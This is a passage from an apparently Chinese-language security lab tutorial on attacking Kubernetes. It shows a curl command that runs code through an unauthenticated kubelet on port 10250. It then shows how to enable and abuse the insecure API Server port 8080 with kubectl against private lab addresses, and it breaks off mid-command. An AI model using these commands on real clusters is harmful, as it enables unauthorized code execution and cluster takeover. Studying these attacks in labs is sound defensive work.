curl -XPOST -k “https://192.168.139.132:10250/run///” -d “cmd=id”
执行的命令是test03容器里的命令,需要进行容器逃逸。
二、演示案例-云原生-K8s安全-API Server未授权访问
1、攻击8080端口:API Server(Master)未授权访问
旧版本的k8s的API Server默认会开启两个端口:8080和6443。
6443是安全端口,安全端口使用TLS加密;但是8080端口无需认证,
仅用于测试。6443端口需要认证,且有 TLS 保护。(k8s<1.16.0为旧版本)
新版本k8s默认已经不开启8080。需要更改相应的配置
cd /etc/kubernetes/manifests/
- –insecure-port=8080
- –insecure-bind-address=0.0.0.0
重启kubelet进程
systemctl restart kubelet
kubectl官方工具下载地址:https://kubernetes.io/zh-cn/docs/tasks/tools/
一、获取所有主机(nodes)节点
kubectl.exe -s 192.168.139.130:8080 get nodes
二、获取所有容器(pods)节点
kubectl.exe -s 192.168.139.130:8080 get pods
三、创建新的docker容器
kubectl -s 19